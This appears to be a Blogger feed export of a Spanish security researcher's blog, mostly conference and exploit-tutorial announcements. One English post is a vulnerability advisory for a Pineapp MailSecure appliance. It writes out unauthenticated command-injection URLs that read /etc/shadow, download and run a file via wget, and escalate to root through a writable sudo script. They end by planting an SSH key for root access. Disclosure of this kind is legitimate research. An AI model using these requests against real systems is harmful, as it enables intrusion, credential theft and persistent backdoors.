tag:blogger.com,1999:blog-6476487467831625342024-02-02T15:07:27.977-08:00Boken's BlogEste blog es un cuaderno de bitácoras de las cosas que hago referentes a temas de Seguridad Informática.
Escritura de exploits, Ingeniería inversa, Análisis de Vulnerabilidades, Seguridad Web.Bokenhttp://www.blogger.com/profile/13008727550075774684noreply@blogger.comBlogger24125tag:blogger.com,1999:blog-647648746783162534.post-29997579642888329402017-03-08T17:15:00.003-08:002017-03-08T17:18:17.080-08:00RootedCON 2017: TLOTA - The Lord Of The ATMsEste fin de semana pasado (2,3 y 4 de Marzo) tuvo lugar una nueva edición de la <a href="https://www.rootedcon.com/rooted2017">RootedCON 2017</a> y este año fuimos a dar una charla mi compañero del CyberSOC de Deloitte - <a href="https://twitter.com/Eldoctorbugs">Rubén Rodenas</a> y <a href="https://twitter.com/boken_">yo</a> sobre Cajeros Automáticos (ATM).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjciM24i3LhKK_f7v9bMGjYm-h6-kQuDkEs3jo6knZ9YrO4_eK_JDZymzq2CFWC2-37aUh6YkFh7_MwRVSuxyhmyBmEUxwTzntEEzY3nMCdDM5O2c04Zf3czQcryJsGeWa50OF8eGJ9c_o/s1600/IMG_2405.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjciM24i3LhKK_f7v9bMGjYm-h6-kQuDkEs3jo6knZ9YrO4_eK_JDZymzq2CFWC2-37aUh6YkFh7_MwRVSuxyhmyBmEUxwTzntEEzY3nMCdDM5O2c04Zf3czQcryJsGeWa50OF8eGJ9c_o/s320/IMG_2405.JPG" width="320" /></a></div>
<br />
Nuestra intención fue un poco contar nuestra historia. Como los clientes nos solicitan auditorias sobre los ATMs, de que forma se afrontan normalmente y que enfoque hemos querido darles en el grupo de Hacking Ético de Deloitte en el CyberSOC. Sobre como es posible comenzar a investigar estos dispositivos, incluida la compra de un par de cajeros automáticos. La descripción la podéis encontrar <a href="https://www.rootedcon.com/rooted2017/ponencias-rooted2017#ruben_garrote">aquí</a>.<br />
<br />
Aunque fuimos a contar la charla mi compañero y yo, hay que aclarar que no habría sido posible sin la colaboración de otros compañeros del grupo de Hacking Ético y que tratamos de reflejar en las diapositivas:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqAEk4Gv3Hf0_wMP99s0MBekUD8wqgY_sHZLSdGk_RZQn3WeXxZlqcWrcfRf7gZnlynJKNICnlTSHwhucXhj6U3qc_T0hc5YBrU7WooiPsR4CO56c1UxqoWEHnFlt1Lo6ob2XoFg5Rbmg/s1600/Agradecimientos.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="287" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqAEk4Gv3Hf0_wMP99s0MBekUD8wqgY_sHZLSdGk_RZQn3WeXxZlqcWrcfRf7gZnlynJKNICnlTSHwhucXhj6U3qc_T0hc5YBrU7WooiPsR4CO56c1UxqoWEHnFlt1Lo6ob2XoFg5Rbmg/s400/Agradecimientos.png" width="400" /></a></div>
<br />
Agradecer a todos el interés por la charla, hasta el punto de completar el aforo de la sala y tener que cerrar el acceso ;D<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOaqjm73cMM7yqTp6xomIJ9Uw3J1XgunzpbWJsOq5-0UtGFzrM7N1TDEg6ivhvj8o-D-ZNh_qAuqw9E6TlKotGtCc5SrmyFIExucAfMVUZed6sRB4rInAfKQdEC1RCypAuaamx1w_Sjjk/s1600/Tweet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOaqjm73cMM7yqTp6xomIJ9Uw3J1XgunzpbWJsOq5-0UtGFzrM7N1TDEg6ivhvj8o-D-ZNh_qAuqw9E6TlKotGtCc5SrmyFIExucAfMVUZed6sRB4rInAfKQdEC1RCypAuaamx1w_Sjjk/s400/Tweet.png" width="400" /></a></div>
<br />
<div style="text-align: center;">
<a href="https://twitter.com/rootedcon/status/837969566038900736"><span style="font-size: x-small;">https://twitter.com/rootedcon/status/837969566038900736</span></a></div>
<br />
Desde aquí muchas gracias a todos por vuestros comentarios y apoyo, nos vemos pronto!!<br />
<br />Bokenhttp://www.blogger.com/profile/13008727550075774684noreply@blogger.com3tag:blogger.com,1999:blog-647648746783162534.post-54816491125894659102015-01-15T03:43:00.001-08:002015-01-15T05:00:45.740-08:00{CrackSLatinoS} Realización de Exploits colaborativos.<div style="text-align: justify;">
Hace un par de meses comencé con una iniciativa de publicación de exploitmes de diferentes niveles en la lista de <a href="https://groups.google.com/forum/#!forum/crackslatinos"><i><b>CrackSLatinoS</b></i></a>. Esta iniciativa viene siendo una extensión de lo que venía haciendo <b>Ricardo Narvaja</b> con los concursos, dónde entre los crackmes, proponía algún exploitme, o realización de exploit a partir de un advisory.</div>
<br />
<div style="text-align: justify;">
Sin embargo nunca llovía a gusto de todos, algunos eran demasiado sencillos, otros demasiado complicados, otras echaban en falta los exploitme en los concursos tras haberse publicado varios sin resolver... Así que tras una <a href="https://groups.google.com/forum/#!topic/crackslatinos/6-9haGB4VDE">encuesta</a> que hice en la lista para ver la aceptación sobre el tema, decidí llevar a cabo esta iniciativa.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
Por cada reto propuesto, se fomenta que la gente vaya enviando sus dudas, comentarios, soluciones concretas sobre cada uno de los problemas que se encuentre en el proceso, hasta llegar a una solución completa en la que si quiere publica un tute, o simplemente ahí quedan las respuestas que luego recopilo y publico en la web en forma de PDF. De tal forma que todo el mundo pueda participar del proceso de elaboración y el que no tiene tiempo para hacer un tute, pueda responder a la gente o resolver cuestiones concretas con el poco tiempo que pueda emplear.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Tanto los enunciados como las soluciones las voy publicando en el WEB STORAGE de Ricardo Narvaja:</div>
<div style="text-align: justify;">
<a href="http://ricardonarvaja.info/WEB/EXPLOITING/" target="_blank">http://ricardonarvaja.info/<wbr></wbr>WEB/EXPLOITING/</a><br />
<a href="http://ricardo.crver.net/WEB/EXPLOITING/" target="_blank">http://ricardo.crver.net/WEB/<wbr></wbr>EXPLOITING/</a> (mirror)</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Os animo a todos a registraros en la lista y participar de los hilos generados con vuestros comentarios. Hay retos para todos los niveles:</div>
<div style="text-align: justify;">
<b>- Nivel Básico:</b> Exploitmes a medida con cuestiones concretas para guiar el aprendizaje de los nuevos en el tema y con los que aprender aspectos básicos.</div>
<div style="text-align: justify;">
<b>- Nivel Medio:</b> Realización de exploit de un software concreto. Cada uno tendrá sus peculiaridades, y peticiones concretas.</div>
<div style="text-align: justify;">
<b>- Nivel Avanzado: </b>Aquí se pretende intercambiar, descubrir, definir métodos o formas de llevar a cabo temas complejos de exploiting: Fuzzing, Bug Hunting, Vulnerability Analysis. Uso de herramientas/técnicas avanzadas como ejecución simbólica, análisis estático en código fuente o binario, uso de scripts y/o plugins para la detección de fallos....</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Como se puede ver la idea es que todo el mundo pueda participar para desarrollar y aprender los aspectos que mas le interesen.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Aquí os dejo los enlaces a los hilos:</div>
<div style="text-align: justify;">
<b>Nivel Básico</b> </div>
<div style="text-align: justify;">
<a href="https://groups.google.com/forum/#!searchin/crackslatinos/[EXPLOIT]$20Nivel/crackslatinos/dwWwFrOfaXc/DAIhlElQrDEJ"><span class="GFP-UI5CMGC" id="t-t">[EXPLOIT] Nivel básico - #1 - exploitme2-win.c</span></a></div>
<div style="text-align: justify;">
<a href="https://groups.google.com/forum/#!searchin/crackslatinos/[EXPLOIT]$20Nivel/crackslatinos/Fs_pqIPFAS4/PCHl-VHShYkJ">[EXPLOIT] Nivel básico #2 - Análisis y reconstrucción de código - exploitme_src. s</a></div>
<br />
<b>Nivel Medio</b> <br />
<div style="text-align: justify;">
<a href="https://groups.google.com/forum/#!searchin/crackslatinos/[EXPLOIT]$20Nivel/crackslatinos/WZw9t8d0L78/l9YiKNyQHycJ">[EXPLOIT] Nivel medio - #1 CVE-2011-4862</a></div>
<a href="https://groups.google.com/forum/#!searchin/crackslatinos/[EXPLOIT]$20Nivel/crackslatinos/R2Yj_R7uxvs/4xlIu89NPf0J"><span class="GFP-UI5CMGC" id="t-t">[EXPLOIT] Nivel Medio - #2 CVE-2010-3275 - VLC</span></a><br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Nivel Avanzado</b></div>
<div style="text-align: justify;">
<a href="https://groups.google.com/forum/#!searchin/crackslatinos/[EXPLOIT]$20Nivel/crackslatinos/e0dSn7fQsGo/lNkOj03JJnkJ">[EXPLOIT] Nivel avanzado - #1 Bug hunting thttpd</a></div>
<br />
ANIMO ESPERO VUESTROS COMENTARIOS Y PARTICIPACIÓN!!!!Bokenhttp://www.blogger.com/profile/13008727550075774684noreply@blogger.com0tag:blogger.com,1999:blog-647648746783162534.post-37081454401453833332014-10-29T09:37:00.000-07:002014-10-29T09:52:01.149-07:00ZDI-14-071 - KingSCADA Stack Overflow - Tutorial sobre la realización del exploit.<div style="text-align: justify;">
Por fin tras más de 5 años, me animo a participar de nuevo en otro concurso de Exploiting de CrackSLatinoS. De esta forma también pongo mi granito de arena para que se sigan proponiendo y resolviendo estos retos tan interesantes y útiles.</div>
<br />
<u><b>Enunciado del reto:</b></u><br />
Uno de los motivos que me ha impulsado a resolverlo precisamente es el atractivo de su enunciado:<br />
<br />
<a href="http://www.zerodayinitiative.com/advisories/ZDI-14-071/">http://www.zerodayinitiative.com/advisories/ZDI-14-071/</a><br />
<br />
Simple, ¿verdad? También muy real.<br />
<br />
Del advisory inicial se extrae la siguiente información:<br />
<div style="text-align: justify;">
“<i><span style="font-size: x-small;">This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of WellinTech KingScada. Authentication is not required to exploit this vulnerability. The specific flaw exists within the protocol parsing code contained in kxNetDispose.dll. The parent service is called AEserver.exe and listens on port 12401. The process performs arithmetic on an user-supplied value used to determine the size of a copy operation allowing a potential integer wrap to cause a stack buffer overflow. An unauthenticated attacker can leverage this vulnerability to execute code under the context of the SYSTEM user.</span></i>”</div>
<br />
Y del CVE asignado, indicado en el mismo advisory, se indican los detalles de las versiones afectadas y no afectadas:<br />
<br />
<a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0787">http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0787</a><br />
<br />
<div style="text-align: justify;">
“<i><span style="font-size: x-small;">Stack-based buffer overflow in WellinTech KingSCADA before 3.1.2.13 allows remote attackers to execute arbitrary code via a crafted packet.</span></i>”</div>
<br />
<u><b>Tutorial:</b></u><br />
<div style="text-align: justify;">
El tutorial muestra todo el proceso desde la búsqueda de las versiones disponibles, el <i>binary diffing</i> de las mismas para analizar el parche y modificaciones realizadas en la versión vulnerable y la versión solucionada, análisis en dinámico para llevar el flujo a los bloques básicos objetivos, análisis del crash y finalmente la elaboración del exploit utilizando <a href="https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/">mona.py</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Podéis descargar el tutorial desde mi repositorio a la derecha del blog o directamente pinchando <a href="http://www.mediafire.com/download/2q3wcie5p9al9jj/2014-Solucion_C.Trim.Numero1-KingSCADA_Stack_Overflow-ZDI-14-071_-_Boken.zip" target="_blank">aquí</a></div>
<br />
Espero que os guste y os animéis a practicar con este software.<br />
<br />Bokenhttp://www.blogger.com/profile/13008727550075774684noreply@blogger.com2tag:blogger.com,1999:blog-647648746783162534.post-10020976270140178782013-11-19T07:33:00.000-08:002013-11-19T08:08:35.086-08:00[Advisory] Pineapp MailSecure total pwnage<div>
In February 2013 I send Pineapp the following information:<br />
------------------------------<wbr></wbr>------------------------------<wbr></wbr>-----<br />
It is possible execute any command bash as qmailq unprivilege user,
sending only the following https request, without authentication.<br />
<a href="https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;%20cat%20/etc/shadow" target="_blank">https://192.168.24.24:7443/<wbr></wbr>admin/confnetworking.html?cmd=<wbr></wbr>nslookup&hostip=&nstype=any&<wbr></wbr>nsserver=www.google.es;%20cat%<wbr></wbr>20/etc/shadow</a><br />
<br />
To upload any file (script, binary, etc...) it is possible with wget command.<br />
<a href="https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;wget%20http://server.com/somefile%20-O%20/tmp/somefile" target="_blank">https://192.168.24.24:7443/<wbr></wbr>admin/confnetworking.html?cmd=<wbr></wbr>nslookup&hostip=&nstype=any&<wbr></wbr>nsserver=www.google.es;wget%<wbr></wbr>20http://server.com/somefile%<wbr></wbr>20-O%20/tmp/somefile</a><br />
<br />
Download and execute it is possible with this request:<br />
<a href="https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;wget%20http://server.com/somefile%20-O%20/tmp/somefile;chmod%20+x%20somefile;/tmp/somefile" target="_blank">https://192.168.24.24:7443/<wbr></wbr>admin/confnetworking.html?cmd=<wbr></wbr>nslookup&hostip=&nstype=any&<wbr></wbr>nsserver=www.google.es;wget%<wbr></wbr>20http://server.com/somefile%<wbr></wbr>20-O%20/tmp/somefile;chmod%20+<wbr></wbr>x%20somefile;/tmp/somefile</a><br />
<br />
Details of bug:<br />
Lines 115-120 of /srv/www/htdocs/admin/<wbr></wbr>confnetworking.html<br />
----------------snip----------<wbr></wbr>-------<br />
$query=explode("\n",shell_<wbr></wbr>exec("/usr/bin/host -t '$nstype' '$hostip' $nsserver"));<br />
foreach ($query as $line)<br />
if ($line)<br />
echo preg_replace("/\t/"," &<wbr></wbr>nbsp; ",$line)."<br />
\n";<br />
?><br />
----------------snip----------<wbr></wbr>-------<br />
<br />
Also
it is possible make privilege escalation to root with a weak sudoers
configuration, on /tmp/rc.firewall file. If you overwrite this file with
this content:<br />
---------<br />
#!/bin/bash<br />
$1<br />
---------<br />
you must get a privileged backdoor.<br />
It is possible with the following request:<br />
<a href="https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;echo" target="_blank">https://192.168.24.24:7443/<wbr></wbr>admin/confnetworking.html?cmd=<wbr></wbr>nslookup&hostip=&nstype=any&<wbr></wbr>nsserver=www.google.es;echo</a> '%23!/bin/bash' > /tmp/fileheader<br />
<a href="https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;echo" target="_blank">https://192.168.24.24:7443/<wbr></wbr>admin/confnetworking.html?cmd=<wbr></wbr>nslookup&hostip=&nstype=any&<wbr></wbr>nsserver=www.google.es;echo</a> '$1' > /tmp/filecode<br />
<a href="https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;mv" target="_blank">https://192.168.24.24:7443/<wbr></wbr>admin/confnetworking.html?cmd=<wbr></wbr>nslookup&hostip=&nstype=any&<wbr></wbr>nsserver=www.google.es;mv</a> /tmp/rc.firewall /tmp/rc.firewall_<br />
<a href="https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;cat" target="_blank">https://192.168.24.24:7443/<wbr></wbr>admin/confnetworking.html?cmd=<wbr></wbr>nslookup&hostip=&nstype=any&<wbr></wbr>nsserver=www.google.es;cat</a> /tmp/fileheader /tmp/filecode > /tmp/rc.firewall<br />
<a href="https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;chmod" target="_blank">https://192.168.24.24:7443/<wbr></wbr>admin/confnetworking.html?cmd=<wbr></wbr>nslookup&hostip=&nstype=any&<wbr></wbr>nsserver=www.google.es;chmod</a> %2bx /tmp/rc.firewall<br />
<a href="https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;rm" target="_blank">https://192.168.24.24:7443/<wbr></wbr>admin/confnetworking.html?cmd=<wbr></wbr>nslookup&hostip=&nstype=any&<wbr></wbr>nsserver=www.google.es;rm</a> /tmp/fileheader<br />
<a href="https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;rm" target="_blank">https://192.168.24.24:7443/<wbr></wbr>admin/confnetworking.html?cmd=<wbr></wbr>nslookup&hostip=&nstype=any&<wbr></wbr>nsserver=www.google.es;rm</a> /tmp/filecode<br />
<br />
And execute commands as root with:<br />
<a href="https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;chmod" target="_blank">https://192.168.24.24:7443/<wbr></wbr>admin/confnetworking.html?cmd=<wbr></wbr>nslookup&hostip=&nstype=any&<wbr></wbr>nsserver=www.google.es;chmod</a> %2bx /tmp/rc.firewall 'whoami'<br />
<br />
With this, you can sent a private ssh key and get access by ssh service. To perform this you can make the following request:<br />
<a href="https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;echo" target="_blank">https://192.168.24.24:7443/<wbr></wbr>admin/confnetworking.html?cmd=<wbr></wbr>nslookup&hostip=&nstype=any&<wbr></wbr>nsserver=www.google.es;echo</a> '%73%73%68%2d%72%73%61%20%41%<wbr></wbr>41%41%41%42%33%4e%7a%61%43%31%<wbr></wbr>79%63%32%45%41%41%41%41%42%49%<wbr></wbr>77%41%41%41%51%45%41%79%54%6f%<wbr></wbr>4c%32%75%6b%51%36%4c%76%44%6a%<wbr></wbr>78%51%65%4e%55%72%54%59%35%2b%<wbr></wbr>51%66%57%37%47%51%52%4c%51%68%<wbr></wbr>44%4f%69%77%7a%46%48%42%4a%66%<wbr></wbr>33%59%66%49%44%50%6f%74%45%48%<wbr></wbr>41%4d%43%7a%75%45%48%56%72%34%<wbr></wbr>49%2f%41%77%52%73%78%76%4a%44%<wbr></wbr>2b%4e%55%2b%2b%53%65%72%34%76%<wbr></wbr>7a%35%4d%68%53%6c%50%37%64%47%<wbr></wbr>53%78%47%58%39%31%37%7a%4b%53%<wbr></wbr>53%4b%33%79%55%78%33%42%75%46%<wbr></wbr>44%38%49%52%53%46%51%47%35%64%<wbr></wbr>33%75%50%72%46%63%2f%4d%2b%33%<wbr></wbr>61%37%30%4f%7a%45%44%2f%59%71%<wbr></wbr>79%75%53%63%35%64%79%4c%64%67%<wbr></wbr>59%32%61%47%77%6f%48%77%6a%4e%<wbr></wbr>6f%5a%6b%79%65%44%77%72%67%63%<wbr></wbr>2b%50%65%57%66%78%57%37%63%44%<wbr></wbr>39%72%2f%4f%56%6d%38%59%49%61%<wbr></wbr>70%7a%75%34%37%77%65%71%53%70%<wbr></wbr>38%70%37%2b%43%58%4f%45%41%4c%<wbr></wbr>64%2b%50%4e%54%79%4b%30%43%34%<wbr></wbr>7a%51%58%37%72%35%6d%37%79%48%<wbr></wbr>45%34%50%74%31%6f%75%41%43%45%<wbr></wbr>6c%46%56%38%4a%4f%4f%45%38%4c%<wbr></wbr>49%76%38%55%4a%67%57%30%43%64%<wbr></wbr>41%55%4f%48%6a%49%75%2b%5a%6f%<wbr></wbr>6d%35%54%71%50%73%72%6e%70%64%<wbr></wbr>44%4e%59%6e%2b%76%33%6d%33%57%<wbr></wbr>76%4f%50%71%36%66%69%38%61%72%<wbr></wbr>79%53%33%61%4e%6e%7a%53%74%51%<wbr></wbr>4e%5a%61%33%35%50%64%75%42%4a%<wbr></wbr>49%39%33%4e%41%79%4f%48%54%59%<wbr></wbr>54%31%75%56%6a%6c%79%55%51%3d%<wbr></wbr>3d%20%72%75%62%65%6e%40%72%75%<wbr></wbr>62%65%6e%2d%6c%61%70%74%6f%70' > /tmp/key.pub<br />
<a href="https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo" target="_blank">https://192.168.24.24:7443/<wbr></wbr>admin/confnetworking.html?cmd=<wbr></wbr>nslookup&hostip=&nstype=any&<wbr></wbr>nsserver=www.google.es;sudo</a> /tmp/rc.firewall 'mv /root/.ssh/authorized_keys /root/.ssh/authorized_keys_'<br />
<a href="https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo" target="_blank">https://192.168.24.24:7443/<wbr></wbr>admin/confnetworking.html?cmd=<wbr></wbr>nslookup&hostip=&nstype=any&<wbr></wbr>nsserver=www.google.es;sudo</a> /tmp/rc.firewall 'cp /root/.ssh/authorized_keys /tmp'<br />
<a href="https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;cat" target="_blank">https://192.168.24.24:7443/<wbr></wbr>admin/confnetworking.html?cmd=<wbr></wbr>nslookup&hostip=&nstype=any&<wbr></wbr>nsserver=www.google.es;cat</a> /tmp/authorized_keys /tmp/key.pub > /tmp/keys.pub<br />
<a href="https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo" target="_blank">https://192.168.24.24:7443/<wbr></wbr>admin/confnetworking.html?cmd=<wbr></wbr>nslookup&hostip=&nstype=any&<wbr></wbr>nsserver=www.google.es;sudo</a> /tmp/rc.firewall 'mv /tmp/keys.pub /root/.ssh/authorized_keys'<br />
<a href="https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo" target="_blank">https://192.168.24.24:7443/<wbr></wbr>admin/confnetworking.html?cmd=<wbr></wbr>nslookup&hostip=&nstype=any&<wbr></wbr>nsserver=www.google.es;sudo</a> /tmp/rc.firewall 'chown root:root /root/.ssh/authorized_keys'<br />
<a href="https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo%20/tmp/rc.firewall" target="_blank">https://192.168.24.24:7443/<wbr></wbr>admin/confnetworking.html?cmd=<wbr></wbr>nslookup&hostip=&nstype=any&<wbr></wbr>nsserver=www.google.es;sudo%<wbr></wbr>20/tmp/rc.firewall</a> 'killall sshd'<br />
<a href="https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo%20/tmp/rc.firewall" target="_blank">https://192.168.24.24:7443/<wbr></wbr>admin/confnetworking.html?cmd=<wbr></wbr>nslookup&hostip=&nstype=any&<wbr></wbr>nsserver=www.google.es;sudo%<wbr></wbr>20/tmp/rc.firewall</a> 'sshd'<br />
<br />
This key have password: '1234'<br />
<br />
Now you can get access with ssh as root and up tun interface with the appliance with ssh client:<br />
ssh <a href="mailto:root@192.168.24.24" target="_blank">root@192.168.24.24</a> -p 7022 -w0:0 -i /home/ruben/key<br />
<br />
With this the attacker have a VPN on the same network segment of MailSecure appliance vulnerable.<br />
------------------------------<wbr></wbr>------------------------------<wbr></wbr>-----<br />
<br />
This I made a live demo of vulnerability, but don't revealed the manufacturer, then the bugs was not fixed.<br />
<a href="http://boken00.blogspot.com.es/2012/11/ii-conferencias-de-seguridad-navaja.html" target="_blank">http://boken00.blogspot.com.<wbr></wbr>es/2012/11/ii-conferencias-de-<wbr></wbr>seguridad-navaja.html</a></div>
<div>
Video demo will be release soon on my blog.</div>
<div>
<br /></div>
Version affected:<br />
MailSecure <= 5099SK<br />
<div>
<br />
Credits:<br />
-----------<br />
Ruben Garrote García<br />
rubengarrote [at] gmail [dot] com<br />
<a href="http://boken00.blogspot.com/" target="_blank">http://boken00.blogspot.com</a><br />
@Boken_</div>
Bokenhttp://www.blogger.com/profile/13008727550075774684noreply@blogger.com3tag:blogger.com,1999:blog-647648746783162534.post-91698521717208099822012-11-07T15:55:00.000-08:002012-11-07T15:55:38.743-08:00II CONFERENCIAS DE SEGURIDAD NAVAJA NEGRA – 30 de Noviembre / 1 de Diciembre<br />
Tengo el placer de comunicaros que, junto con Alejandro Nolla (@z0mbiehunt3r), inauguraremos la conferencia con la primera charla:<br />
<b>All your appliances are belong to us. Presentación de un 0-day</b><br />
Análisis de appliances de red. Confías en ellos, pero, ¿deberías? Ejemplo práctico, de cursito de formación a 0-day en lo
que dura el coffee break<br />
<br />
Os dejo la presentación oficial de la conferencia que también podéis consultar aqui:<br />
<a href="http://navajanegra.com/">http://navajanegra.com/</a><br />
<br />
----------------------------------------------------------------<br />
Los días <strong>30 de noviembre</strong> y <strong>1 de diciembre</strong>, tendrán lugar las <strong>II CONFERENCIAS DE SEGURIDAD “NAVAJA NEGRA”</strong> en <strong>Albacete</strong> con una serie de charlas centradas en la <strong>Seguridad de la Información</strong> como:<br />
<ul>
<li>All your appliances are belong to us. Presentación de un 0-day</li>
<li>Show me your Intents</li>
<li>HASH COLLISIONS: Welcome to the (un)real World!</li>
<li>Take a walk on the wild side</li>
<li>A brief introduction to reversing code with OllyDbg and other tools</li>
<li>From mail to jail: Exploit your ex.girlfriend</li>
<li>(in)Security in Mobile Communications</li>
<li>IPv6 vs IDS, se aceptan apuestas…</li>
</ul>
Se realizarán en el <strong>SALON DE ACTOS DEL CEEI</strong> (<a href="http://navajanegra.com/llegar.aspx" target="_blank">Centro Europero de Empresas de Innovación</a>) el viernes en horario de tarde y el sábado en horario de mañana e impartidas por <a href="http://navajanegra.com/ponentes.aspx" target="_blank">reconocidos profesionales</a>.<br />
Son completamente <strong>gratuitas</strong> pero es necesario <a href="http://navajanegra.com/inscripcion.aspx" target="_blank">registrarse</a> (aforo limitado).<br />
La información sobre las charlas, está disponible en el apartado <a href="http://navajanegra.com/itinerario.aspx" target="_blank">Itinerario del Congreso</a>. Si os desplazais desde fuera de Albacete, tenemos <a href="http://navajanegra.com/materiales/cedula_renfe.pdf" target="_blank">descuentos de Renfe</a> y del <a href="http://navajanegra.com/alojamiento.aspx" target="_blank">Hotel Beatriz</a> para alojaros. También teneis el <a href="http://navajanegra.com/materiales/cartel-A4.pdf" target="_blank">Cartel Oficial</a> para descargar.<br />
Calendario de conferencias:<br />
<div style="text-align: center;">
<a href="http://www.flu-project.com/wp-content/uploads/calendario.png"><img alt="" class="aligncenter wp-image-8152" height="460" src="http://www.flu-project.com/wp-content/uploads/calendario.png" title="calendario" width="581" /></a></div>
Bokenhttp://www.blogger.com/profile/13008727550075774684noreply@blogger.com0tag:blogger.com,1999:blog-647648746783162534.post-61974256694055773602012-07-05T08:13:00.000-07:002012-07-05T08:13:09.445-07:00Introducción al análisis estático de código fuente en BlackBerry<div style="text-align: justify;">
Hoy he publicado un artículo sobre el análisis estático de código en BlackBerry.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Realmente es una introducción sobre esta plataforma. Cuál es su arquitectura y por dónde comenzar a mirar el código.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
He puesto algunos pequeños ejemplos para que podáis haceros una idea general, pero la cuestión es concienciarse sobre la importancía de escribir código seguro.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
BlackBerry tiene mucha documentación sobre sus APIs y un buen SDK totalmente documentado, que aunque vienen ejemplos sobre la manera correcta de escribir código, no hacen referencia explicita sobre cómo evitar determinados fallos de seguridad.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
El artículo lo podéis consultar en el blog de Buguroo o en este <a href="https://blog.buguroo.com/?p=8771" target="_blank">enlace</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Espero que os guste!! ;D </div>Bokenhttp://www.blogger.com/profile/13008727550075774684noreply@blogger.com0tag:blogger.com,1999:blog-647648746783162534.post-3686938260772339422012-04-03T06:22:00.002-07:002012-04-03T06:30:53.072-07:00Análisis de vulnerabilidad y exploit para CVE-2011-4130 en ProFTPd < 1.3.3g/1.3.4 – (Parte I)Bueno hace ya mas de 3 años y medio que no escribo nada e iba siendo hora de romper con esta costumbre tan fea que había cogido. Así que <a style="font-style: italic;" href="http://blog.buguroo.com/?p=3951">aquí</a> os dejo un articulo que he escrito sobre el análisis de la vulnerabilidad y el exploit para CVE-2011-4130 en ProFTPd < 1.3.3g/1.3.4.<br /><br />La cuestión es que es un fallo interesante y en su momento no había ningún exploit público (creo que sigue sin haberlo), así que me decidí a estudiar el fallo y hacer el exploit para Metasploit ;D pero eso será en las siguientes partes, por ahora ir analizando la información proporcionada, que vienen curvas ;DBokenhttp://www.blogger.com/profile/13008727550075774684noreply@blogger.com2tag:blogger.com,1999:blog-647648746783162534.post-1754418721503365522009-08-12T02:38:00.000-07:002009-08-12T02:42:06.808-07:00Web del proyecto EEWHola a todos.<br /><br />Debido a la cantidad de información y post que iremos creando para explicar y comentar las nuevas funcinoalidades y el estado del proyecto, en adelante todos los post relacionados con la herramienta, tanto <span style="font-weight: bold;">Yibam</span> como yo las iremos publicando en el blog que hemos creado expresamente para el mismo.<br /><br />El blog lo podéis visitar pinchando <a href="http://www.expertexploitwriter.com/">aquí:</a><br /><br />Espero que os interese el proyecto y sigáis su desarrollo!!<br /><br />Gracias a todos por vuestro interés.<br 